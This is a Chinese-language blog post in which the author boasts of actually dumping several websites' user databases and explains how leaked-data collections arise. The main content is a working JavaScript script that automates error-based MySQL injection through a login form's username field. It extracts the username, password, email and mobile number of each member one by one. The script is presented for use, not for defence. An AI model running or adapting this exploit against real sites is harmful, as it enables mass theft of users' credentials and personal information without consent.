[MySQL]真实的曝库攻击
今天是真的曝了几个库,而且实现了全自动化记录数据。
一个网站可以曝出几百上千的用户信息,这下知道所谓的社工库怎么来的了吧:
var bb=0;
var logs = "";
for(i=1;i<400;i){
var username=new Array();
username[0] = "exp";
bb++;
switch(bb){
case 1:
username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',username) from nqx_ucenter_member where id="+i+")),0)";
break;
case 2:
username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',password) from nqx_ucenter_member where id="+i+")),0)";
break;
case 3:
username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',email) from nqx_ucenter_member where id="+i+")),0)";
break;
case 4:
username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',mobile) from nqx_ucenter_member where id="+i+")),0)";
bb=0;
i++;
break;
}
password = 1;
var data = {
username: username,
password:password
};
$.ajax({
type: 'POST',
url: '',
data:data,
success: (function(){}),
error:(function(ele){
tmp = ele.responseText.match(/XPATH syntax error: '([^<]*)<\/h1>/g)[0].split('+');
tmp = tmp[1].split("'<");
tmp = tmp[0];
logs += tmp+",";
if(bb==0){
logs += "\n\r";
console.log(logs);
logs = "";
}
}),
async:false
});
}
标签: MySQL
评论:
日历
最新微语
- 有的时候,会站在分叉路口,不知道向左还是右
2023-12-26 15:34
- 繁花乱开,鸟雀逐风。心自宁静,纷扰不闻。
2023-03-14 09:56
- 对于不可控的事,我们保持乐观,对于可控的事情,我们保持谨慎。
2023-02-09 11:03
- 小时候,
暑假意味着无忧无虑地玩很长一段时间,
节假意味着好吃好喝还有很多长期不见的小朋友来玩...
长大后,
这是女儿第一个暑假,
一个半月...
2022-07-11 08:54
- Watching the autumn leaves falling as you grow older together
2018-10-25 09:45
分类
最新评论
- Goonog
i get it now :) - 萧
@Fluzak:The web host... - Fluzak
Nice blog here! Also... - Albertarive
In my opinion you co... - ChesterHep
What does it plan? - ChesterHep
No, opposite. - mojoheadz
Everything is OK!... - Josephmaigh
I just want to say t... - ChesterHep
What good topic - AnthonyBub
Certainly, never it ...
2017-02-23 22:30